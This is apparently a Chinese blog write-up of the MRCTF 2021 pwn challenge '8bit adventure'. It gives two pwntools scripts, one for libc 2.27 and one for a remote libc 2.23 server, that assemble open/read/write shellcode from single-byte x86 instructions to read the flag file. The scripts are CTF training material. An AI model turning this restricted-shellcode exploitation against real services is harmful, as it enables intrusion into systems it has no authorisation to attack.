MRCTF 2021 8bit adventure
MRCTF 2021 8bit adventure
程序大概的意思是只能用一个字节的汇编语句进行orw
要注意的是程序中使用了close(0),使用使用open系统调用时返回的文件描述符应该是0
懂汇编就会做
这是在libc2.27下的利用
from pwn import *
context(os='linux', arch='x86',log_level='debug')io=process("adventure")
# ebx,ecx,edx
# open 利用自加和自减控制寄存器的值,利用push和pop 还有修改esp 在栈上构造“flag”字段
payload1="push edi;pop eax;"+"inc eax;"*0x66+"push eax;"
payload1+="inc esp;"*5+"inc eax;"*6+"push eax;"
payload1+="inc esp;"*5+"dec eax;"*11+"push eax;"
payload1+="inc esp;"*5+"inc eax;"*6+"push eax;"
payload1+="inc esp;"+"pop eax;push edi;"+"dec esp;"*4+"push esp;pop ebx;push edi;pop ecx;push edi;pop eax;"
payload1+="inc eax;"*5+"push edi;pop edx;"
#read
payload2="push ebx;pop ecx;"+"push eax;pop ebx;"+"push edi;pop edx;"
payload2+="inc edx;"*0x10+"push edi;pop eax;"+"inc eax;"*3
# write
payload3="push edi;pop ebx;"+"inc ebx;"+"push ebx;pop eax;"+"inc eax;"*3
#gdb.attach(io,"b *0x80488EE")payload=asm(payload1)+'\xcd'+asm(payload2)+'\xcd'+asm(payload3)+'\xcd'
io.sendlineafter("Give me your code\n",payload)
#pause()
io.interactive()这是在libc2.23下的利用 比赛时的远程环境应该就是libc2.23
from pwn import *
context.log_level='debug'io=remote("node.mrctf.fun",10301)
#io=process("./adventure")
# ebx,ecx,edx
payload1="push edx;pop edi;"+"push edi;pop eax;"+"inc eax;"*0x66+"push eax;"
payload1+="inc esp;"*5+"inc eax;"*6+"push eax;"
payload1+="inc esp;"*5+"dec eax;"*11+"push eax;"
payload1+="inc esp;"*5+"inc eax;"*6+"push eax;"
payload1+="inc esp;"+"pop eax;push edi;"+"dec esp;"*4+"push esp;pop ebx;push edi;pop ecx;push edi;pop eax;"
payload1+="inc eax;"*5payload2="push ebx;pop ecx;"+"push eax;pop ebx;"+"push edi;pop edx;"
payload2+="inc edx;"*0x30+"push edi;pop eax;"+"inc eax;"*3payload3="push edi;pop ebx;"+"inc ebx;"+"push ebx;pop eax;"+"inc eax;"*3
#gdb.attach(io,"b *0x80488EE")payload=asm(payload1)+'\xcd'+asm(payload2)+'\xcd'+asm(payload3)+'\xcd'
io.sendlineafter("Give me your code\n",payload)
#pause()
io.interactive()MRCTF 2021 8bit adventure相关推荐
- 2021 年音视频技术与发展
2021 年音视频技术与发展 2021 年,音视频技术的应用场景已随处可见,从游戏场景「吃鸡」.电商场景直播连麦.教育场景授课答题,再到金融场景银行视频开户等都有身影.那么,回望今年音视频领域到底有哪 ...
- 2021年大数据基础(一):大数据概念
2021大数据领域优质创作博客,带你从入门到精通,该博客每天更新,逐渐完善大数据各个知识体系的文章,帮助大家更高效学习. 有对大数据感兴趣的可以关注微信公众号:三帮大数据 目录 大数据概念 数据 常见 ...
- 2021年人工神经网络第三次作业-第二题:遗传算法与人工神经网络-参考答案
简 介: 给出了对于BP网络求解异或问题过程中,利用遗传算法完成网络演变的过程.所使用的遗传算法是最基本的遗传算法.利用遗传算法对于网络的系数进行演变,可以对网络系数初始化过程进行优化.对于不同的遗传 ...
- 我们从2021谷歌I/O大会给的谜题中发现了隐藏信息
梦晨 发自 凹非寺 量子位 报道 | 公众号 QbitAI 谷歌I/O开发者大会在2020年因疫情取消,今年终于强势回归. 还是受疫情影响,今年I/O将完全在线上举办,同时对所有人免费,只要在线注册就 ...
- 【项目实战课】基于ncnn框架与KL散度的8bit对称模型量化与推理实战
欢迎大家来到我们的项目实战课,本期内容是<基于ncnn框架与KL散度的8bit对称模型量化与推理实战>. 所谓项目实战课,就是以简单的原理回顾+详细的项目实战的模式,针对具体的某一个主题, ...
- Java学习笔记,面向猴子记笔记2021/5/29更新
如何在 3 天内学会 Java? https://www.zhihu.com/question/66535555/answer/1799868707 (手动滑稽) 在编辑器中鼠标右键source可以快 ...
- 2021年中国示波器行业及细分产品数字示波器市场现状分析[图]
一.概述 示波器是一种用途广泛.易于使用且功能强大的电子测量仪器,属于信号分析类仪器的一种,用于观测.分析和记录各种电信号的变化.示波器通过把被测电压随时间的变化关系转换为可视的波形图像,提供直观的研 ...
- 阿里2021年面经汇总
阿里2021年面经汇总 仅作为笔记,码字不易,转载请标明出处. 文章目录 阿里2021年面经汇总 前言 前言 仅作为笔记 1.MySQL事务的四种特性,分别解释;ok 2.隔离性是如何做到的?四种隔离 ...
- adventure项目 可视化看板总结
将之前的项目做一下复盘. 可视化看板 一.项目背景 Adventure Works Cycles是AdventureWorks样本数据库所虚构的公司,该公司生产和销售金属和复合材料自行车在全国各个市场 ...
最新文章
- C#实现路由器断开连接,更改公网ip
- 中国高中生近视率高达81%,眼科专家:源头在小学阶段
- kinect 录制彩色和深度视频
- 怎么设置java的精度值_Java:如何为double值设置Precision?
- 资料收集新一代 Linux 文件系统 btrfs 简介
- OpenKruise - 云原生应用自动化引擎正式开源
- 华为云 - 公有云产品 - OBS计费说明
- 大数据之-Hadoop3.x_Hadoop_MapReduce_介绍---大数据之hadoop3.x工作笔记0081
- Excel2013数据透视表、Power View中的钻取
- java属性定义_Java管理扩展指南--几分钟带你理解MBean
- 超酷的 mip-infinitescroll 无限滚动(无限下拉)
- discuz uc_server 配置登录
- 课时4—切入切出动画
- 输出当前MySQL的环境变量:
- NOR FLASH闪存芯片ID应用之软件保护场景
- vue-devtools 必备开发工具
- 华为路由器如何配置静态路由
- 移动端轮播图——网易云音乐手机端样式
- s饥荒服务器物品id,流年饥荒控制台指令大全+物品大全+服务器管理命令大全.docx...
- 巧用友盟UShare、ULink玩转裂变营销